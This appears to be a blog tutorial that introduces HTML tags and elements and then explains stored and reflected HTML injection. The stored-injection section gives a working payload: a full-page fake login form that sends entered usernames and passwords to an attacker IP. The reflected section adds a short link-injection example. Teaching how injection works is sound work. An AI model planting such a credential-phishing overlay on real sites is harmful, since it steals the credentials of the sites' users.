HTML is a standard Hyper Text Markup Language which use for designing
Web pages.
→ HTML describes the structure of Web pages using markup
→ HTML elements are the building blocks of HTML pages
→ HTML elements are represented by tags
→ HTML tags label pieces of content such as “heading”,
“paragraph”, “table” and so on.
→ Browsers do not show the HTML tags, but utilize them to submit
the content of the page
{Please look image 01}
HTML Tags:
HTML tags are element names surrounded by angle brackets. Their two types of tags are opening and closing tag respectively.
HTML Elements:
An HTML element usually consists of a start tag and end tag, with the
content inserted in between.
HTML Attributes:
Attributes provide additional information about HTML elements.
Attributes generally come in form of name/value pairs like:
name=”value”
Create Web page using HTML
Generally “Notepad” is used for writing HTML code and save the
text file with .html/.htm extension, then open the saved file using
any web browser.
Example: Web page
<!DOCTYPE html>
<html>
<head>
<title>HTML Injection</title>
</head>
<body bgcolor=”pink”>
<br>
<center><h2>Welcome for the example web page</h2>
<br>
<p>Responsible: Infosec.intellegence.blog.in</p>
</center>
</body>
</html>
→ The <!DOCTYPE html> declaration defines this
document to be HTML5
→ The <html> element is the root element of an HTML
page
→ The <head> element contains meta information about
the document
→ The <title> element specifies a title for the
document
→ The <body> element contains the visible page
content; have bgcolor attribute as “pink”
→ <br> element defines break line/next line
→ <h1> element defines a large heading
→ <p> element defines a paragraph
HTML Version:
→ HTML - 1991
→ HTML 2.0 - 1995
→ HTML 3.2 - 1997
→ HTML 4.01 - 1999
→ XHTML - 2000
→ HTML5 - 2014
HTML Injection:
HTML injection is the vulnerability inside any website that occurs
when the user input is not correctly sanitized or the output is not
encoded and the attacker is able to inject valid HTML code in to a
vulnerable web page. There are so many techniques which could use
element and attributes to submit HTML content.
If strings are not correctly sanitized the problem could lead to XSS
based HTML injection.
There are two types of HTML injection as follows,
→ Stored HTML
→ Reflected HTML
Stored HTML:
A stored HTML also known as Persistence because through this
vulnerability the injected malicious code get stored permanently
inside the web-server and the application server give out it back to
the user when user visits the respective website. Client will click
on payload which appears as an official part of the website, the
injected HTML code will get execute by the browser.
{Please look image 02}
Enter the following html code inside given text filed for making HTML
attack.
<div style="position: absolute; left: 0px; top: 0px; width:
1900px; height: 1300px; z-index: 1000; background-color:white;
padding: 1em;">Please login with valid credentials:<br><form
name="login" action="http://172.20.10.3
/login.htm"><table><tr><td>Username:</td><td><input
type="text"
name="username"/></td></tr><tr><td>Password:</td><td><input
type="text" name="password"/></td></tr><tr><td
colspan=2 align=center><input type="submit"
value="Login"/></td></tr></table></form></div>
The above HTML code will generate a payload to create user login page
on targeted web page and forward that credentials to attacker’s IP.
{Please look image 03}
{Please look image 04}
Attacker is able to receive client entered username and password.
Since it is permanently stored, attacker have a possibility to
receive “n” number of usernames and passwords from the valid
clients.
Reflected HTML:
The reflected HTML is also known as Non Persistence and it occurs
when the web application respond immediately on user’s input
without validating the inputs, this lead an attacker to inject
browser executable code inside the single HTML response. It is named
as “non-persistence” since the malicious script does not get
stored inside the web server, therefore attacker will send the
malicious link through phishing to trap the user.
{Please look image 07}
n username=<h1><a
href="http://google.com">Mohanraja</a></h1>
and password=<h2>blogspot.com</h2>
{Please look image 06}
